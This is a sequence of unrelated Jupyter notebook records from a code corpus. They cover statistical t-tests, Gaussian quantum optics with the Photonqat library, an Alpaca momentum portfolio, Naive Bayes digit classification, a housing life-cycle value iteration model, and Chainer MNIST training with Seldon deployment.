normally distributed", "_____no_output_____" ], [ "### Checking Normal distribution by method of `Shapiro stats`\nhttps://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.shapiro.html", "_____no_output_____" ] ], [ [ "stats.shapiro(bp_reading['bp_diff'])", "_____no_output_____" ], [ "stats.ttest_rel(bp_reading['bp_after'], bp_reading['bp_before'])", "_____no_output_____" ] ], [ [ "**Note:-** __Here, `t-test = -3.337` and `p-value = 0.0011` since p-value is less than the significant value hence null-hypothesis is rejected`(Alpha = 0.05)`__", "_____no_output_____" ], [ "### T-test using `researchpy`\nhttps://researchpy.readthedocs.io/en/latest/ttest_documentation.html", "_____no_output_____" ] ], [ [ "rp.ttest(bp_reading['bp_after'], bp_reading['bp_before'], \n paired = True, equal_variances=False)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ] ]
cb1cb80e9cc6fc0295a3482e7d53562859617477
11,080
ipynb
Jupyter Notebook
examples/GaussianGates.ipynb
ryosukehata/Photonqat
d5e320d3cc9ed94f6d63b1721f6871f13a0e6ea7
[ "Apache-2.0" ]
null
null
null
examples/GaussianGates.ipynb
ryosukehata/Photonqat
d5e320d3cc9ed94f6d63b1721f6871f13a0e6ea7
[ "Apache-2.0" ]
null
null
null
examples/GaussianGates.ipynb
ryosukehata/Photonqat
d5e320d3cc9ed94f6d63b1721f6871f13a0e6ea7
[ "Apache-2.0" ]
null
null
null
49.686099
5,228
0.71065
[ [ [ "import photonqat as pq", "_____no_output_____" ], [ "import numpy as np\nimport matplotlib.pyplot as plt", "_____no_output_____" ] ], [ [ "## Photonqat\n\n基本的なゲート動作と測定を一通り行っています。", "_____no_output_____" ] ], [ [ "G = pq.Gaussian(2) # two qumode [0, 1]\nG.D(0, 2) # Displacement gate, x to x+2\nG.S(0, 1) # X squeeIng gate, r=1\nG.R(0, np.pi/4) # pi/4 rotation gate\nG.BS(0, 1, np.pi/4) # 50:50 beam splitter\nx = G.MeasX(1) # Measure mode 1\nG.Wigner(0) # plot\nprint('measured x =', x)\nprint('mu0 =', G.mean(0)) # mu of qumode 0\nprint('cov0 =', G.cov(0)) # covarince of qumode 1", "_____no_output_____" ] ], [ [ "## 以下、メモ", "_____no_output_____" ], [ "## Phase space について\n\nN bosonic mode Hilbert space \n$\\otimes^{N}_{k=1} \\mathcal{H}_k$\n\nvectorial operator \n$\\hat{\\mathbf{b}} = (\\hat{a}_1, \\hat{a}_1^{\\dagger}, \\dots, \\hat{a}_N, \\hat{a}_N^{\\dagger})$ : 2N elements\n\nbosonic commutation relations \n$[\\hat{b}_i, \\hat{b}_j] = \\Omega_{ij}\\ \\ (i, j = 1, \\dots, 2N)$ \n\n$\\mathbf{\\Omega} = \\oplus_{k=1}^{N}\\omega\\ \\ \\ \n\\omega = \n\\begin{pmatrix}\n0 & 1 \\\\\n-1 & 0 \\\\\n\\end{pmatrix}\n$\n\nQuadrature field \n$\\hat{\\mathbf{x}} = (\\hat{q}_1, \\hat{p}_1, \\dots, \\hat{q}_N, \\hat{p}_N)$ : 2N elements\n\ncanonical commutation relation \n$[\\hat{x}_i, \\hat{x}_j] = 2i\\Omega_{ij}\\ \\ (i, j = 1, \\dots, 2N)$ ", "_____no_output_____" ], [ "## 密度演算子とWigner関数\n\n任意の密度演算子$\\hat{\\rho}$を考える \n\n任意の密度演算子は等価なWigner関数が存在する\n\nWeyl operator \n$D(\\xi) = \\exp(i \\hat{x}^T \\Omega \\hat{\\xi})$ \n\nこれを用いて、Wigner characteristic functionを定義できる \n$\\chi (\\xi) = \\mathrm{Tr}[\\hat{\\rho}D(\\xi)]$\n\nWigner characteristic functionのフーリエ変換がWigner function \n$W(\\mathbf{x}) = \\int_{R^{2N}} \\frac{d^{2N}}{(2\\pi)^{2N}} \\exp{(-i \\hat{x}^T \\Omega \\hat{\\xi})} \\chi (\\xi)$", "_____no_output_____" ], [ "## 統計量とWigner関数\n\nWigner functionは統計量でも定義できる \n\n- first moment \n$\\bar{\\mathbf{x}} = \\langle \\hat{\\mathbf{x}} \\rangle= \\mathrm{Tr}[\\hat{\\mathbf{x}} \\hat{\\rho}]$\n\n- second moment \n$V_{ij} = \\frac{1}{2}\\langle \\{\\Delta\\hat{x}_i, \\Delta\\hat{x}_j \\}\\rangle$ \n$\\{ A, B \\} = AB+BA$\n\n$V_{ii}$は$\\hat{x}_i$の分散をあらわす\n\nGaussian stateは最初の2モーメントだけで完全に記述可能", "_____no_output_____" ], [ "## Gaussian Unitaryについて\n\nQuadrature operatorにおいては、Gaussian UnitaryはAffien写像で書ける! \n$(\\mathbf{S}, \\mathbf{d}) : \\hat{\\mathrm{x}}\\to \\mathbf{S}\\mathrm{x} + \\mathbf{d}$\n\nWilliamson's Theorem \n任意の偶数次元の正定値実行列はsimplectic transformで対角化できる \n$\\mathbf{V} = \\mathbf{SV}^{\\oplus}\\mathbf{S}^{T}$ \n$\\mathbf{V}^{\\oplus} = \\oplus^{N}_{k=1} \\nu_k \\mathbf{I}$", "_____no_output_____" ], [ "## Gaussian Measurement \n\nPOVM: $\\Pi_i = E_{i}^{\\dagger}E_i\\ \\ \\ (\\sum_i E_{i}^{\\dagger}E_i = I)$ \nこれを連続量に置き換える \n\nGaussian Measurementとは、Gaussian stateに対して行い、出力結果がGaussian Distributionで、測定しなかったモードはGaussian stateのままである\n\n測定するsubsystemを$\\mathbf{B}$として、それ以外のsubsystemを$\\mathbf{A}$とする。\n\n測定結果の確率分布:測定モード以外の直交位相を周辺化したGaussian Wigner分布 \n測定後の状態:以下のようになる.\n\n\n$\\mathbf{V} = \\mathbf{A} - \\mathbf{C}(\\mathbf{\\Pi B \\Pi})^{-1}\\mathbf{C}^T$ \n$\\mathbf{\\Pi} = \\rm{diag}(1, 0)$ ($\\hat{x}$測定の場合)\n\n$\\mathbf{\\Pi B \\Pi}$は非正則。pseudo-inverseを用いる。 \n$(\\mathbf{\\Pi B \\Pi})^{-1} = B_{11}^{-1}\\Pi$\n\nこれは多変量ガウス分布の条件付き分布をとるのと基本的に同じ \nなので同様に測定後の状態の平均もとれる\n\n$\\mathbf{\\mu} = \\mathbf{\\mu_A} - \\mathbf{C}(\\mathbf{\\Pi B \\Pi})^{-1}(\\mathbf{\\mu_B} - x_B\\mathbf{\\Pi})$", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown" ]
[ [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1cbcbe071d7569479bf02a128fef6f4412ffae
3,225
ipynb
Jupyter Notebook
analysis/notebooks/Labs/momentum_portfolio.ipynb
ksilo/LiuAlgoTrader
90b3ffdf4fd61adf37880e7b01ca4137a013f79c
[ "MIT" ]
null
null
null
analysis/notebooks/Labs/momentum_portfolio.ipynb
ksilo/LiuAlgoTrader
90b3ffdf4fd61adf37880e7b01ca4137a013f79c
[ "MIT" ]
null
null
null
analysis/notebooks/Labs/momentum_portfolio.ipynb
ksilo/LiuAlgoTrader
90b3ffdf4fd61adf37880e7b01ca4137a013f79c
[ "MIT" ]
null
null
null
20.806452
75
0.51814
[ [ [ "# Momentum Portfolio Analysis", "_____no_output_____" ] ], [ [ "portfolio_id = \"233d16d0-3d07-4153-a4c4-b9cee6b3aef9\"", "_____no_output_____" ] ], [ [ "### imports", "_____no_output_____" ] ], [ [ "import alpaca_trade_api as tradeapi\nfrom liualgotrader.analytics import portfolio\nfrom liualgotrader.common.market_data import index_data", "_____no_output_____" ] ], [ [ "### Load SP500 data", "_____no_output_____" ] ], [ [ "sp500 = await index_data(\"SP500\")", "_____no_output_____" ] ], [ [ "### Load recommanded portfolio details", "_____no_output_____" ] ], [ [ "data_api = tradeapi.REST(base_url=\"https://api.alpaca.markets\")", "_____no_output_____" ], [ "df = await portfolio.load(data_api, portfolio_id)\nfor i, row in df.iterrows():\n df.loc[df.symbol == row.symbol, \"Security\"] = sp500.loc[\n sp500.Symbol == row.symbol, \"Security\"\n ].values[0]\n df.loc[df.symbol == row.symbol, \"Sector\"] = sp500.loc[\n sp500.Symbol == row.symbol, \"GICS Sector\"\n ].values[0]\n df.loc[df.symbol == row.symbol, \"Industry\"] = sp500.loc[\n sp500.Symbol == row.symbol, \"GICS Sub-Industry\"\n ].values[0]", "_____no_output_____" ] ], [ [ "## Suggest Momentum Portfolio", "_____no_output_____" ] ], [ [ "portfolio_size = 5000", "_____no_output_____" ], [ "for i, row in df.iterrows():\n df.loc[df.symbol==row.symbol,\"subtotal\"] = df.price * df.qty\ndf['accumulatvie'] = df.subtotal.cumsum()", "_____no_output_____" ], [ "display(df)\nprint(f\"total to invest: {df.subtotal.sum()}\")", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
cb1cc4e6db39db3159db38c56292538eef46914c
9,586
ipynb
Jupyter Notebook
CE019_Lab3/019_Lab3_Task2_Digits_Processing.ipynb
neel4888/019_Neel
2d4458d796ed64a592fc32aef23750608b20c4f8
[ "Apache-2.0" ]
null
null
null
CE019_Lab3/019_Lab3_Task2_Digits_Processing.ipynb
neel4888/019_Neel
2d4458d796ed64a592fc32aef23750608b20c4f8
[ "Apache-2.0" ]
null
null
null
CE019_Lab3/019_Lab3_Task2_Digits_Processing.ipynb
neel4888/019_Neel
2d4458d796ed64a592fc32aef23750608b20c4f8
[ "Apache-2.0" ]
null
null
null
9,586
9,586
0.79324
[ [ [ "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn import datasets\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, confusion_matrix, precision_score, recall_score", "_____no_output_____" ], [ "ds_digit = datasets.load_digits()\nprint(\"No. of examples and features in the dataset are:\", ds_digit.data.shape)\nds = pd.DataFrame(ds_digit.data)\n#ds.head()", "No. of examples and features in the dataset are: (1797, 64)\n" ], [ "#ds.info()\n#ds.describe()", "_____no_output_____" ] ], [ [ "Printing the names of features and label types of digits", "_____no_output_____" ] ], [ [ "print(\"Features are as follows:\\n\", ds_digit.data)\nprint(\"\\nLabels:\\n\", np.unique(ds_digit.target))", "13 Featuresare as follows:\n [[ 0. 0. 5. ... 0. 0. 0.]\n [ 0. 0. 0. ... 10. 0. 0.]\n [ 0. 0. 0. ... 16. 9. 0.]\n ...\n [ 0. 0. 1. ... 6. 0. 0.]\n [ 0. 0. 2. ... 12. 0. 0.]\n [ 0. 0. 10. ... 12. 1. 0.]]\n\nLabels:\n [0 1 2 3 4 5 6 7 8 9]\n" ], [ "training_data, testing_data, training_target, testing_target = train_test_split(ds_digit.data, ds_digit.target, test_size = 0.20, random_state = 19)", "_____no_output_____" ] ], [ [ "Creating an instance of classifier and fitting the model.", "_____no_output_____" ] ], [ [ "mnb=MultinomialNB()\nmnb.fit(training_data,training_target)", "_____no_output_____" ] ], [ [ "Testing the model and getting accuracy score, confusion matrix, precision score and recall score", "_____no_output_____" ] ], [ [ "# Testing\nprediction_target = mnb.predict(testing_data)\n\n# Getting Accuracy\naccuracy = accuracy_score(testing_target, prediction_target)\nprint(\"Accuracy Score:\\n\", accuracy)\n\n# Getting Confusion Matrix\ncm = confusion_matrix(testing_target, prediction_target)\nprint(\"\\nConfusion Matrix:\\n\",cm)\n\n# Getting Precision\nprecision = precision_score(testing_target, prediction_target, average=None)\nprint(\"\\nPrecision Score:\\n\", precision)\n\n# Getting Recall\nrecall = recall_score(testing_target, prediction_target, average=None)\nprint(\"\\nRecall Score:\\n\", recall)", "Accuracy Score:\n 0.8888888888888888\n\nConfusion Matrix:\n [[42 0 0 0 1 0 0 0 0 0]\n [ 0 28 5 0 0 0 0 0 6 3]\n [ 0 3 33 0 0 0 0 0 4 0]\n [ 0 0 0 31 0 0 0 0 3 0]\n [ 0 0 0 0 36 0 0 1 0 0]\n [ 0 0 0 0 0 26 0 0 0 2]\n [ 0 2 0 0 0 0 26 0 0 0]\n [ 0 0 0 0 2 0 0 31 0 0]\n [ 0 2 0 0 1 0 0 1 38 1]\n [ 0 0 0 0 0 1 0 2 0 29]]\n\nPrecision Score:\n [1. 0.8 0.86842105 1. 0.9 0.96296296\n 1. 0.88571429 0.74509804 0.82857143]\n\nRecall Score:\n [0.97674419 0.66666667 0.825 0.91176471 0.97297297 0.92857143\n 0.92857143 0.93939394 0.88372093 0.90625 ]\n" ], [ "plt.gray() \nplt.matshow(ds_digit.images[100]) ", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
cb1cc81d2feb5ae4a88ba0c6fea1ab29b47b39e6
14,662
ipynb
Jupyter Notebook
20201106/simpleHousing.ipynb
dongxulee/lifeCycle
2b4a74dbd64357d00b29f7d946a66afcba747cc6
[ "MIT" ]
null
null
null
20201106/simpleHousing.ipynb
dongxulee/lifeCycle
2b4a74dbd64357d00b29f7d946a66afcba747cc6
[ "MIT" ]
null
null
null
20201106/simpleHousing.ipynb
dongxulee/lifeCycle
2b4a74dbd64357d00b29f7d946a66afcba747cc6
[ "MIT" ]
null
null
null
38.182292
157
0.422248
[ [ [ "### Simple housing version", "_____no_output_____" ], [ "* State: $[w, n, M, e, \\hat{S}, z]$, where $z$ is the stock trading experience, which took value of 0 and 1. And $\\hat{S}$ now contains 27 states.\n* Action: $[c, b, k, q]$ where $q$ only takes 2 value: $1$ or $\\frac{1}{2}$", "_____no_output_____" ] ], [ [ "from scipy.interpolate import interpn\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom constant import *\nimport warnings\nwarnings.filterwarnings(\"ignore\")", "_____no_output_____" ], [ "#Define the utility function\ndef u(c):\n return (np.float_power(c, 1-gamma) - 1)/(1 - gamma)\n\n#Define the bequeath function, which is a function of wealth\ndef uB(tb):\n return B*u(tb)\n\n#Calcualte HE \ndef calHE(x):\n # the input x is a numpy array \n # w, n, M, e, s, z = x\n HE = H*pt - x[:,2]\n return HE\n\n#Calculate TB \ndef calTB(x):\n # the input x as a numpy array\n # w, n, M, e, s, z = x\n TB = x[:,0] + x[:,1] + calHE(x)\n return TB\n\n#The reward function \ndef R(x, a):\n '''\n Input:\n state x: w, n, M, e, s, z\n action a: c, b, k, q = a which is a np array\n Output: \n reward value: the length of return should be equal to the length of a\n '''\n w, n, M, e, s, z = x\n reward = np.zeros(a.shape[0])\n # actions with not renting out \n nrent_index = (a[:,3]==1)\n # actions with renting out \n rent_index = (a[:,3]!=1)\n # housing consumption not renting out \n nrent_Vh = (1+kappa)*H\n # housing consumption renting out \n rent_Vh = (1-kappa)*(H/2)\n # combined consumption with housing consumption \n nrent_C = np.float_power(a[nrent_index][:,0], alpha) * np.float_power(nrent_Vh, 1-alpha)\n rent_C = np.float_power(a[rent_index][:,0], alpha) * np.float_power(rent_Vh, 1-alpha)\n reward[nrent_index] = u(nrent_C)\n reward[rent_index] = u(rent_C)\n return reward", "_____no_output_____" ], [ "def transition(x, a, t):\n '''\n Input: state and action and time, where action is an array\n Output: possible future states and corresponding probability \n '''\n w, n, M, e, s, z = x\n s = int(s)\n e = int(e)\n nX = len(x)\n aSize = len(a)\n # mortgage payment\n m = M/D[T_max-t]\n M_next = M*(1+rh) - m\n # actions\n b = a[:,1]\n k = a[:,2]\n q = a[:,3]\n # transition of z\n z_next = np.ones(aSize)\n if z == 0:\n z_next[k==0] = 0\n # we want the output format to be array of all possible future states and corresponding\n # probability. x = [w_next, n_next, M_next, e_next, s_next, z_next]\n # create the empty numpy array to collect future states and probability \n if t >= T_R:\n future_states = np.zeros((aSize*nS,nX))\n n_next = gn(t, n, x, (r_k+r_b)/2)\n future_states[:,0] = np.repeat(b*(1+r_b[s]), nS) + np.repeat(k, nS)*(1+np.tile(r_k, aSize))\n future_states[:,1] = np.tile(n_next,aSize)\n future_states[:,2] = M_next\n future_states[:,3] = 0\n future_states[:,4] = np.tile(range(nS),aSize)\n future_states[:,5] = np.repeat(z_next,nS)\n future_probs = np.tile(Ps[s],aSize)\n else:\n future_states = np.zeros((2*aSize*nS,nX))\n n_next = gn(t, n, x, (r_k+r_b)/2)\n future_states[:,0] = np.repeat(b*(1+r_b[s]), 2*nS) + np.repeat(k, 2*nS)*(1+np.tile(r_k, 2*aSize))\n future_states[:,1] = np.tile(n_next,2*aSize)\n future_states[:,2] = M_next\n future_states[:,3] = np.tile(np.repeat([0,1],nS), aSize)\n future_states[:,4] = np.tile(range(nS),2*aSize)\n future_states[:,5] = np.repeat(z_next,2*nS)\n # employed right now:\n if e == 1:\n future_probs = np.tile(np.append(Ps[s]*Pe[s,e], Ps[s]*(1-Pe[s,e])),aSize)\n else:\n future_probs = np.tile(np.append(Ps[s]*(1-Pe[s,e]), Ps[s]*Pe[s,e]),aSize)\n return future_states, future_probs", "_____no_output_____" ], [ "# Use to approximate the discrete values in V\nclass Approxy(object):\n def __init__(self, points, Vgrid):\n self.V = Vgrid \n self.p = points\n def predict(self, xx):\n pvalues = np.zeros(xx.shape[0])\n for e in [0,1]:\n for s in range(nS):\n for z in [0,1]:\n index = (xx[:,3] == e) & (xx[:,4] == s) & (xx[:,5] == z)\n pvalues[index]=interpn(self.p, self.V[:,:,:,e,s,z], xx[index][:,:3], \n bounds_error = False, fill_value = None)\n return pvalues\n# used to calculate dot product\ndef dotProduct(p_next, uBTB, t):\n if t >= T_R:\n return (p_next*uBTB).reshape((len(p_next)//(nS),(nS))).sum(axis = 1)\n else:\n return (p_next*uBTB).reshape((len(p_next)//(2*nS),(2*nS))).sum(axis = 1)", "_____no_output_____" ], [ "# Value function is a function of state and time t < T\ndef V(x, t, NN):\n w, n, M, e, s, z = x\n yat = yAT(t,x)\n m = M/D[T_max - t]\n # If the agent can not pay for the ortgage \n if yat + w < m:\n return [0, [0,0,0,0,0]]\n # The agent can pay for the mortgage\n if t == T_max-1:\n # The objective functions of terminal state \n def obj(actions):\n # Not renting out case \n # a = [c, b, k, q]\n x_next, p_next = transition(x, actions, t)\n uBTB = uB(calTB(x_next)) # conditional on being dead in the future\n return R(x, actions) + beta * dotProduct(uBTB, p_next, t)\n else:\n def obj(actions):\n # Renting out case\n # a = [c, b, k, q]\n x_next, p_next = transition(x, actions, t)\n V_tilda = NN.predict(x_next) # V_{t+1} conditional on being alive, approximation here\n uBTB = uB(calTB(x_next)) # conditional on being dead in the future\n return R(x, actions) + beta * (Pa[t] * dotProduct(V_tilda, p_next, t) + (1 - Pa[t]) * dotProduct(uBTB, p_next, t))\n \n def obj_solver(obj):\n # Constrain: yat + w - m = c + b + kk\n actions = []\n budget1 = yat + w - m\n for cp in np.linspace(0.001,0.999,11):\n c = budget1 * cp\n budget2 = budget1 * (1-cp)\n #.....................stock participation cost...............\n for kp in np.linspace(0,1,11):\n # If z == 1 pay for matainance cost Km = 0.5\n if z == 1:\n # kk is stock allocation\n kk = budget2 * kp\n if kk > Km:\n k = kk - Km\n b = budget2 * (1-kp)\n else:\n k = 0\n b = budget2\n # If z == 0 and k > 0 payfor participation fee Kc = 5\n else:\n kk = budget2 * kp \n if kk > Kc:\n k = kk - Kc\n b = budget2 * (1-kp)\n else:\n k = 0\n b = budget2\n #..............................................................\n # q = 1 not renting in this case \n actions.append([c,b,k,1])\n \n # Constrain: yat + w - m + (1-q)*H*pr = c + b + kk\n for q in [1,0.5]:\n budget1 = yat + w - m + (1-q)*H*pr\n for cp in np.linspace(0.001,0.999,11):\n c = budget1*cp\n budget2 = budget1 * (1-cp)\n #.....................stock participation cost...............\n for kp in np.linspace(0,1,11):\n # If z == 1 pay for matainance cost Km = 0.5\n if z == 1:\n # kk is stock allocation\n kk = budget2 * kp\n if kk > Km:\n k = kk - Km\n b = budget2 * (1-kp)\n else:\n k = 0\n b = budget2\n # If z == 0 and k > 0 payfor participation fee Kc = 5\n else:\n kk = budget2 * kp \n if kk > Kc:\n k = kk - Kc\n b = budget2 * (1-kp)\n else:\n k = 0\n b = budget2\n #..............................................................\n # i = 0, no housing improvement when renting out \n actions.append([c,b,k,q]) \n \n actions = np.array(actions)\n values = obj(actions)\n fun = np.max(values)\n ma = actions[np.argmax(values)]\n return fun, ma\n \n fun, action = obj_solver(obj)\n return np.array([fun, action])", "_____no_output_____" ], [ "# wealth discretization \nws = np.array([10,25,50,75,100,125,150,175,200,250,500,750,1000,1500,3000])\nw_grid_size = len(ws)\n# 401k amount discretization \nns = np.array([1, 5, 10, 15, 25, 50, 100, 150, 400, 1000])\nn_grid_size = len(ns)\n# Mortgage amount\nMs = np.array([0.01*H,0.05*H,0.1*H,0.2*H,0.3*H,0.4*H,0.5*H,0.8*H]) * pt\nM_grid_size = len(Ms)\npoints = (ws,ns,Ms)\n# dimentions of the state\ndim = (w_grid_size, n_grid_size,M_grid_size,2,nS,2)\ndimSize = len(dim)\n\nxgrid = np.array([[w, n, M, e, s, z] \n for w in ws\n for n in ns\n for M in Ms\n for e in [0,1]\n for s in range(nS)\n for z in [0,1]\n ]).reshape(dim + (dimSize,))\n\n# reshape the state grid into a single line of states to facilitate multiprocessing\nxs = xgrid.reshape((np.prod(dim),dimSize))\nVgrid = np.zeros(dim + (T_max,))\ncgrid = np.zeros(dim + (T_max,))\nbgrid = np.zeros(dim + (T_max,))\nkgrid = np.zeros(dim + (T_max,))\nqgrid = np.zeros(dim + (T_max,))\nprint(\"The size of the housing: \", H)\nprint(\"The size of the grid: \", dim + (T_max,))", "The size of the housing: 750\nThe size of the grid: (15, 10, 8, 2, 27, 2, 60)\n" ], [ "%%time\n# value iteration part, create multiprocesses 32\npool = Pool()\nfor t in range(T_max-1,T_max-3, -1):\n print(t)\n if t == T_max - 1:\n f = partial(V, t = t, NN = None)\n results = np.array(pool.map(f, xs))\n else:\n approx = Approxy(points,Vgrid[:,:,:,:,:,:,t+1])\n f = partial(V, t = t, NN = approx)\n results = np.array(pool.map(f, xs))\n Vgrid[:,:,:,:,:,:,t] = results[:,0].reshape(dim)\n cgrid[:,:,:,:,:,:,t] = np.array([r[0] for r in results[:,1]]).reshape(dim)\n bgrid[:,:,:,:,:,:,t] = np.array([r[1] for r in results[:,1]]).reshape(dim)\n kgrid[:,:,:,:,:,:,t] = np.array([r[2] for r in results[:,1]]).reshape(dim)\n qgrid[:,:,:,:,:,:,t] = np.array([r[3] for r in results[:,1]]).reshape(dim)\npool.close()", "59\n58\n" ] ] ]
[ "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ] ]
cb1cdb1ec7124800d2f99a1279464e7999345f50
88,761
ipynb
Jupyter Notebook
examples/models/chainer_mnist/chainer_mnist.ipynb
LueJian/seldon-core
a40ea0cb52a04502d2dc5f78d124fca67b0926ae
[ "Apache-2.0" ]
1
2020-10-10T07:46:00.000Z
2020-10-10T07:46:00.000Z
examples/models/chainer_mnist/chainer_mnist.ipynb
LueJian/seldon-core
a40ea0cb52a04502d2dc5f78d124fca67b0926ae
[ "Apache-2.0" ]
null
null
null
examples/models/chainer_mnist/chainer_mnist.ipynb
LueJian/seldon-core
a40ea0cb52a04502d2dc5f78d124fca67b0926ae
[ "Apache-2.0" ]
null
null
null
64.741794
521
0.490948
[ [ [ "# Chainer MNIST Model Deployment\n\n * Wrap a Chainer MNIST python model for use as a prediction microservice in seldon-core\n * Run locally on Docker to test\n * Deploy on seldon-core running on minikube\n \n## Dependencies\n\n * [Helm](https://github.com/kubernetes/helm)\n * [Minikube](https://github.com/kubernetes/minikube)\n * [S2I](https://github.com/openshift/source-to-image)\n\n```bash\npip install seldon-core\npip install chainer==6.2.0\n```\n\n## Train locally\n ", "_____no_output_____" ] ], [ [ "#!/usr/bin/env python\nimport argparse\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer import training\nfrom chainer.training import extensions\nimport chainerx\n\n\n# Network definition\nclass MLP(chainer.Chain):\n\n def __init__(self, n_units, n_out):\n super(MLP, self).__init__()\n with self.init_scope():\n # the size of the inputs to each layer will be inferred\n self.l1 = L.Linear(None, n_units) # n_in -> n_units\n self.l2 = L.Linear(None, n_units) # n_units -> n_units\n self.l3 = L.Linear(None, n_out) # n_units -> n_out\n\n def forward(self, x):\n h1 = F.relu(self.l1(x))\n h2 = F.relu(self.l2(h1))\n return self.l3(h2)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Chainer example: MNIST')\n parser.add_argument('--batchsize', '-b', type=int, default=100,\n help='Number of images in each mini-batch')\n parser.add_argument('--epoch', '-e', type=int, default=20,\n help='Number of sweeps over the dataset to train')\n parser.add_argument('--frequency', '-f', type=int, default=-1,\n help='Frequency of taking a snapshot')\n parser.add_argument('--device', '-d', type=str, default='-1',\n help='Device specifier. Either ChainerX device '\n 'specifier or an integer. If non-negative integer, '\n 'CuPy arrays with specified device id are used. If '\n 'negative integer, NumPy arrays are used')\n parser.add_argument('--out', '-o', default='result',\n help='Directory to output the result')\n parser.add_argument('--resume', '-r', type=str,\n help='Resume the training from snapshot')\n parser.add_argument('--unit', '-u', type=int, default=1000,\n help='Number of units')\n parser.add_argument('--noplot', dest='plot', action='store_false',\n help='Disable PlotReport extension')\n group = parser.add_argument_group('deprecated arguments')\n group.add_argument('--gpu', '-g', dest='device',\n type=int, nargs='?', const=0,\n help='GPU ID (negative value indicates CPU)')\n args = parser.parse_args(args=[])\n\n device = chainer.get_device(args.device)\n\n print('Device: {}'.format(device))\n print('# unit: {}'.format(args.unit))\n print('# Minibatch-size: {}'.format(args.batchsize))\n print('# epoch: {}'.format(args.epoch))\n print('')\n\n # Set up a neural network to train\n # Classifier reports softmax cross entropy loss and accuracy at every\n # iteration, which will be used by the PrintReport extension below.\n model = L.Classifier(MLP(args.unit, 10))\n model.to_device(device)\n device.use()\n\n # Setup an optimizer\n optimizer = chainer.optimizers.Adam()\n optimizer.setup(model)\n\n # Load the MNIST dataset\n train, test = chainer.datasets.get_mnist()\n\n train_iter = chainer.iterators.SerialIterator(train, args.batchsize)\n test_iter = chainer.iterators.SerialIterator(test, args.batchsize,\n repeat=False, shuffle=False)\n\n # Set up a trainer\n updater = training.updaters.StandardUpdater(\n train_iter, optimizer, device=device)\n trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.out)\n\n # Evaluate the model with the test dataset for each epoch\n trainer.extend(extensions.Evaluator(test_iter, model, device=device))\n\n # Dump a computational graph from 'loss' variable at the first iteration\n # The \"main\" refers to the target link of the \"main\" optimizer.\n # TODO(niboshi): Temporarily disabled for chainerx. Fix it.\n if device.xp is not chainerx:\n trainer.extend(extensions.DumpGraph('main/loss'))\n\n # Take a snapshot for each specified epoch\n frequency = args.epoch if args.frequency == -1 else max(1, args.frequency)\n trainer.extend(extensions.snapshot(), trigger=(frequency, 'epoch'))\n\n # Write a log of evaluation statistics for each epoch\n trainer.extend(extensions.LogReport())\n\n # Save two plot images to the result dir\n if args.plot and extensions.PlotReport.available():\n trainer.extend(\n extensions.PlotReport(['main/loss', 'validation/main/loss'],\n 'epoch', file_name='loss.png'))\n trainer.extend(\n extensions.PlotReport(\n ['main/accuracy', 'validation/main/accuracy'],\n 'epoch', file_name='accuracy.png'))\n\n # Print selected entries of the log to stdout\n # Here \"main\" refers to the target link of the \"main\" optimizer again, and\n # \"validation\" refers to the default name of the Evaluator extension.\n # Entries other than 'epoch' are reported by the Classifier link, called by\n # either the updater or the evaluator.\n trainer.extend(extensions.PrintReport(\n ['epoch', 'main/loss', 'validation/main/loss',\n 'main/accuracy', 'validation/main/accuracy', 'elapsed_time']))\n\n # Print a progress bar to stdout\n trainer.extend(extensions.ProgressBar())\n\n if args.resume is not None:\n # Resume from a snapshot\n chainer.serializers.load_npz(args.resume, trainer)\n\n # Run the training\n trainer.run()\n\n\nif __name__ == '__main__':\n main()", "/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/chainer/_environment_check.py:41: UserWarning: Accelerate has been detected as a NumPy backend library.\nvecLib, which is a part of Accelerate, is known not to work correctly with Chainer.\nWe recommend using other BLAS libraries such as OpenBLAS.\nFor details of the issue, please see\nhttps://docs.chainer.org/en/stable/tips.html#mnist-example-does-not-converge-in-cpu-mode-on-mac-os-x.\n\nPlease be aware that Mac OS X is not an officially supported OS.\n\n ''') # NOQA\n" ] ], [ [ "Wrap model using s2i", "_____no_output_____" ] ], [ [ "!s2i build . seldonio/seldon-core-s2i-python3:1.3.0-dev chainer-mnist:0.1", "---> Installing application source...\n---> Installing dependencies ...\nLooking in links: /whl\nCollecting chainer==6.2.0 (from -r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/2c/5a/86c50a0119a560a39d782c4cdd9b72927c090cc2e3f70336e01b19a5f97a/chainer-6.2.0.tar.gz (873kB)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (41.0.1)\nCollecting typing<=3.6.6 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading 